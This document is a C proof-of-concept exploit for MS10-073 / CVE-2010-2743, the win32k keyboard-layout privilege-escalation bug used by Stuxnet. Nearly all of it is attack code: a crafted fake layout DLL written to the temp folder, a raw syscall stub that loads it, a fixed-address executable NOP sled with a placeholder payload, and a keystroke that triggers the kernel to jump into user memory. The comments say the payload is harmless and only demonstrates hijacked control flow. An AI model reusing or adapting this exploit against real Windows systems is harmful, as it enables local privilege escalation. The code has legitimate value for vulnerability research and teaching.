Win32k Keyboard Layout Vulnerability (MS10-073 / CVE-2010-2743)
Posted on 14 January 2011
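// My koala is staring at you CºgºD
// Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1
//
// Proof of concept for MS10-073 / CVE-2010-2743: win32k keyboard-layout
// handling, one of the local privilege-escalation bugs used by Stuxnet.
//
// What this file actually does, and its limits:
//   * 32-bit x86 only. The syscall stub is MSVC inline assembly.
//   * The win32k service number (0x11C6) is hard-coded. Service indices change
//     between Windows builds; on a build where 0x11C6 is a different service,
//     the stub simply invokes that other service with these arguments.
//   * The "payload" placed at SHELL_BASE + MAGIC_OFFSET is four NOPs and a
//     `ret 0Ch`. It shows that the kernel transfers control into user-mode
//     memory; it does not elevate privileges. On builds where the assumptions
//     do not hold, expect a crash rather than a clean return.
//   * A malformed layout file is written to %TEMP%\p0wns.boom and removed on a
//     best-effort basis at exit.

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <ntsecapi.h>

#if defined(_MSC_VER) && !defined(_M_IX86)
#error "This PoC uses x86 inline assembly; build it as a 32-bit binary."
#endif

/* User-mode region the kernel is expected to call into, and the offset of the
 * payload inside it: SHELL_BASE + MAGIC_OFFSET == 0x60636261. Both values are
 * fixed by what the kernel dereferences, so the region cannot be relocated. */
#define SHELL_BASE        ((LPVOID)0x60630000)
#define SHELL_SIZE        0xF000
#define MAGIC_OFFSET      0x6261

/* File name of the malformed layout, created in the temp directory. */
#define LAYOUT_FILE_NAME  L"p0wns.boom"

/* Point a UNICODE_STRING at the caller-owned wide string s. Length fields are
 * in bytes; MaximumLength counts the terminating WCHAR as well. */
static void init_unicode_string(PUNICODE_STRING p, PWSTR s)
{
    size_t cb = wcslen(s) * sizeof(WCHAR);

    p->Length        = (USHORT)cb;
    p->MaximumLength = (USHORT)(cb + sizeof(WCHAR));
    p->Buffer        = s;
}

/* Direct win32k system call, bypassing user32's wrapper.
 *   eax        = service number 0x11C6 (build-specific, see header comment)
 *   0x7FFE0300 = KUSER_SHARED_DATA.SystemCall on 32-bit Windows, i.e. the
 *                syscall dispatch pointer (sysenter / int 2Eh stub)
 *   retn 1Ch   = pop the seven stdcall arguments (7 * 4 bytes)
 * Parameter names follow the original PoC; the kernel-side meaning of
 * offTable/dwKLID/Flags is not shown here. */
__declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx(
    IN HANDLE          Handle,
    IN DWORD           offTable,
    IN PUNICODE_STRING puszKeyboardName,
    IN HKL             hKL,
    IN PUNICODE_STRING puszKLID,
    IN DWORD           dwKLID,
    IN UINT            Flags)
{
    __asm {
        mov  eax, 000011C6h
        mov  edx, 7FFE0300h
        call dword ptr [edx]
        retn 1Ch
    }
}

/* Payload: nop x4, `ret 0Ch`, nop x2. The `ret 0Ch` returns to whatever called
 * us (presumably a stdcall site with three dword arguments) — deliberately
 * harmless, the PoC only proves control was hijacked. */
static const unsigned char shellcode[] =
    "\x90\x90\x90\x90\xC2\x0C\x00\x90\x90";

/* Minimal fake keyboard-layout DLL, 0x246 bytes. Read as a PE image (which is
 * how win32k is expected to parse it) only a handful of fields are non-zero:
 *   0x03C  e_lfanew = 0x40               0x046  NumberOfSections = 1
 *   0x054  SizeOfOptionalHeader = 0xE0   0x138  section name ".data"
 *   0x140  VirtualSize 0xE6, VA 0x160, SizeOfRawData 0xE6, PointerToRawData 0x160
 *          (0x160 + 0xE6 == 0x246, the blob's total size)
 *   0x160  start of the layout's pointer table; values such as 0x194, 0x19E,
 *          0x1A6, 0x1AA, 0x19C, 0x1C2 are RVAs into this same blob (RVA ==
 *          file offset here because VA == PointerToRawData).
 * Which of these fields reaches the vulnerable code path is explained in the
 * referenced write-up, not here; the bytes are reproduced unchanged. */
static const unsigned char fakeDll[] =
    /* 0x000 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x010 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x020 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x030 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" /* e_lfanew */
    /* 0x040 */ "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" /* NumberOfSections */
    /* 0x050 */ "\x00\x00\x00\x00\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" /* SizeOfOptionalHeader */
    /* 0x060 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x070 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x080 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x090 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x0A0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x0B0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x0C0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x0D0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x0E0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x0F0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x100 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x110 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x120 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x130 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x2E\x64\x61\x74\x61\x00\x00\x00" /* ".data" */
    /* 0x140 */ "\xE6\x00\x00\x00\x60\x01\x00\x00\xE6\x00\x00\x00\x60\x01\x00\x00" /* section sizes/offsets */
    /* 0x150 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x160 */ "\x94\x01\x00\x00\x9E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" /* table start */
    /* 0x170 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x180 */ "\xA6\x01\x00\x00\xAA\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x190 */ "\x00\x00\x00\x00\x9C\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x1A0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x1B0 */ "\x00\x00\x01\x00\x00\x00\xC2\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x1C0 */ "\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x1D0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x1E0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x1F0 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x200 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x210 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x220 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x230 */ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    /* 0x240 */ "\x00\x00\x00\x00\x00\x00";

/* Entry point. Steps, in order:
 *   1. write fakeDll to %TEMP%\p0wns.boom and re-open it read-only;
 *   2. hand that handle to win32k via the raw NtUserLoadKeyboardLayoutEx call;
 *   3. map SHELL_SIZE bytes at the fixed SHELL_BASE, fill with NOPs and drop
 *      the payload at MAGIC_OFFSET;
 *   4. inject one keyboard event so the kernel processes a key against the
 *      freshly loaded layout (the trigger path per the referenced write-up).
 * Returns 0 when every step succeeded, 1 otherwise. Errors are reported with
 * GetLastError() and the temp file is removed on a best-effort basis. */
int main(int argc, CHAR *argv[])
{
    UNICODE_STRING uStr;
    INPUT          vInput        = {0};
    HANDLE         hFile         = INVALID_HANDLE_VALUE;
    DWORD          bytesWritten  = 0;
    DWORD          fgThread, fgProcess, pathLen;
    HKL            hKbd, hLoaded;
    WCHAR          lpPath[MAX_PATH]       = {0};
    WCHAR          lpLayoutFile[MAX_PATH] = {0};
    LPVOID         lpShellPtr    = NULL;
    int            rc = 1;

    (void)argc;
    (void)argv;

    printf("\n Stuxnet MS10-073/CVE-2010-2743 Exploit\n");
    printf(" Ruben Santamarta - www.reversemode.com\n\n");

    /* Kept from the original PoC. user32 is already imported by this binary
       (SendInput, GetForegroundWindow, ...), so this is effectively a no-op. */
    LoadLibraryA("user32.dll");

    init_unicode_string(&uStr, L"pwn3d.dll");

    /* GetTempPathW returns 0 on failure and the required size (> buffer) when
       the buffer is too small. */
    pathLen = GetTempPathW(MAX_PATH, lpPath);
    if (pathLen == 0 || pathLen >= MAX_PATH) {
        printf(" [!!] GetTempPath failed: %lu\n", GetLastError());
        goto out;
    }

    /* Bounded build of the path; _snwprintf returns a negative value when the
       output would not fit. lpLayoutFile was zero-filled, so it stays
       terminated. In MSVC's wide printf family %s is a wide string. */
    if (_snwprintf(lpLayoutFile, MAX_PATH - 1, L"%s%s", lpPath, LAYOUT_FILE_NAME) < 0) {
        printf(" [!!] Temp path too long\n");
        goto out;
    }

    hFile = CreateFileW(lpLayoutFile, GENERIC_READ | GENERIC_WRITE,
                        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                        CREATE_ALWAYS, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf(" [!!] CreateFile failed: %lu\n", GetLastError());
        goto out;
    }

    /* sizeof - 1 drops the string literal's implicit NUL. A short write would
       leave a truncated header, so it is treated as an error. */
    if (!WriteFile(hFile, fakeDll, (DWORD)(sizeof(fakeDll) - 1), &bytesWritten, NULL)
        || bytesWritten != (DWORD)(sizeof(fakeDll) - 1)) {
        printf(" [!!] WriteFile failed: %lu\n", GetLastError());
        CloseHandle(hFile);
        hFile = INVALID_HANDLE_VALUE;
        goto out_delete;
    }
    printf(" [+] Writing malformed kbd layout file \"%S\" [ %lu ] bytes written\n",
           lpLayoutFile, bytesWritten);
    CloseHandle(hFile);

    /* Re-open read-only; this is the handle the kernel parses. */
    hFile = CreateFileW(lpLayoutFile, GENERIC_READ, FILE_SHARE_READ, NULL,
                        OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf(" [!!] CreateFile (reopen) failed: %lu\n", GetLastError());
        goto out_delete;
    }

    /* Layout currently active on the foreground thread. If there is no
       foreground window the thread id is 0 and GetKeyboardLayout(0) yields the
       current thread's layout. */
    fgThread = GetWindowThreadProcessId(GetForegroundWindow(), &fgProcess);
    hKbd     = GetKeyboardLayout(fgThread);

    /* offTable's low 16 bits (0x0160) equal the section offset in fakeDll;
       dwKLID and Flags are the constants from the original PoC. */
    hLoaded = NtUserLoadKeyboardLayoutEx(hFile, 0x01AE0160, NULL, hKbd,
                                         &uStr, 0x666, 0x101);
    printf(" [+] Loading it...[ %p ]\n", (void *)hLoaded);
    if (hLoaded == NULL) {
        /* A NULL HKL means win32k rejected the layout (patched system,
           different build, or the service number did not match). Sending
           the trigger keystroke would be pointless. */
        printf(" [!!] Keyboard layout was not loaded\n");
        goto out_close;
    }

    /* Fixed-address allocation: fails with ERROR_INVALID_ADDRESS if anything
       already occupies SHELL_BASE..SHELL_BASE+SHELL_SIZE; the address cannot
       be changed because the kernel-side value is fixed. Region is RWX and
       intentionally left mapped until process exit. */
    lpShellPtr = VirtualAlloc(SHELL_BASE, SHELL_SIZE,
                              MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf(" [+] Allocating memory...");
    if (lpShellPtr == NULL) {
        printf("[!!] Error %lx\n", GetLastError());
        goto out_close;
    }
    printf("[ OK ]\n");

    /* NOP sled over the whole region, payload at the expected landing offset. */
    memset(lpShellPtr, 0x90, SHELL_SIZE);
    memcpy((unsigned char *)lpShellPtr + MAGIC_OFFSET, shellcode, sizeof(shellcode) - 1);

    /* One keyboard event with wVk = 0 and all other fields zero. */
    vInput.type   = INPUT_KEYBOARD;
    vInput.ki.wVk = 0;
    printf(" [+] Triggering shellcode...");
    if (SendInput(1, &vInput, sizeof(INPUT)) != 1) {
        printf("[!!] SendInput failed: %lu\n", GetLastError());
        goto out_close;
    }
    printf(" [+] Done\n");
    rc = 0;

out_close:
    CloseHandle(hFile);
    hFile = INVALID_HANDLE_VALUE;
out_delete:
    /* Best effort: may fail while the kernel still references the layout. */
    DeleteFileW(lpLayoutFile);
out:
    return rc;
}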